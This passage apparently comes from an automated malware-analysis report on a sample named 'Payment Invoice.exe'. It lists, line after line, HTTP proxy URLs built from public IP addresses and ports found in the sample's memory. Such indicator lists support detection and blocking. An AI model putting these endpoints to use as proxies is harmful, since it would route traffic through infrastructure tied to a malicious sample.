                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.140.1:8090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.148.210:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.148.210:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.166.134:1111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.166.134:1111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.208.18:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.208.18:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.62.129:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.62.129:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.33.200.32:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.33.200.32:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.43.3.207:2080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.51.121.29:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.51.121.29:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.95.182.26:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.95.182.26:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.95.182.26:5678p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.0.3.222:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.0.3.222:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.130.125.86
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.130.125.86://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.130.125.86:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.134.181.142:9999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.134.181.142:9999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.134.98.222:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.134.98.222:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.164.252.145:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.164.252.145:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.212.252.5:6251
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.212.252.5:6251://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.213.223.46:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.213.223.46:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.214.104
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.214.104.56:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.214.104.56:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.216.69.176:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.216.69.176:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.23.234.201:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.23.234.201:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.68.129.54:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.68.129.54:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.228.35:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.228.35:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.55.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.55.170:8085
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.55.170:8085://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.68.9:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.68.9:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.76.214:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.76.214:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.79.69:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.105.79.69:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.106.216.161:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.106.216.161:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.111.136.110:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.111.136.110:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.112.128.37:9091
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.112.128.37:9091://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163181FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.112.149.41:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.112.149.41:8080://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.112.149.41:8080x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.112.254.66:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.112.254.66:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319CAB000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.113.71.230:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.113.71.230:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.114.53.2:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.114.53.2:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.114.96.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.114.96.125:8291
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.114.96.125:8291://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.115.242.192:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.115.242.192:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.116.82.135:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.116.82.135:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.117.109
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.117.109.1:13793
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.117.109.1:13793://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.118.44.136:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.118.44.136:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.119.96.195:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.119.96.195:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.122.33.34:8182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.122.33.34:8182://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.124.139.137:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.124.139.137:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.124.196.134:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.124.196.134:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.125.154.233:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163182A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.125.154.233:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.125.240
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.125.240.237:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.125.240.237:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.127.106.249:8090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.127.106.249:8090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.129.172.97:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.129.172.97:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.129.3.246:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.129.3.246:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.130.112.253:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.130.112.253:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.130.113.129:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.130.113.129:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.131.8.27:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.131.8.27:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.133.24.211:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.134.165.38:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.134.165.38:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.134.180.241:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.134.180.241:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.139.126.230:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.139.126.230:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.139.126.230:8083p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.140.205
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.140.205.133:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.140.205.133:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.140.34.61:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.140.34.61:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.140.35.11:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.140.35.11:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.141.66.78:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.141.66.78:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.143.9.85:8088
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.143.9.85:8088://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.144.209.104:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.144.209.104:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.147.247.212:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.147.247.212:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.147.247.79:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.147.247.79:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.148.112.117:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.148.112.117:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.148.130.5:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.148.130.5:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.148.192
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.148.192.82:9012
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.148.192.82:9012://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.15.245.18:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.15.245.18:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.151.20.131
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.151.20.131://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.151.20.131:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.152.112.145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.152.112.145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.152.112.145:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.152.232.217:8181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.152.232.217:8181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.152.232.99:8181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.152.232.99:8181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.153.135.100:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.153.135.100:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.153.232.41:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.153.232.41:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B40000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.153.40.38:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.153.40.38:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.154.113.243:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163198C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.154.113.243:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.154.144.202:8715
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.154.144.202:8715://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.155.54.26:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.155.54.26:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.156.17.114:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.156.17.114:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.156.17.153:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.156.17.153:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.156.96.12:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.159.46.2:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.159.46.2:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.159.47.34:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.159.47.34:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.159.66.61:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.159.66.61:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.160.184.222:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.160.184.222:80800q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.160.184.222:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.160.205.82:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.160.205.82:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.160.41.138:3829
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.160.41.138:3829://proxy
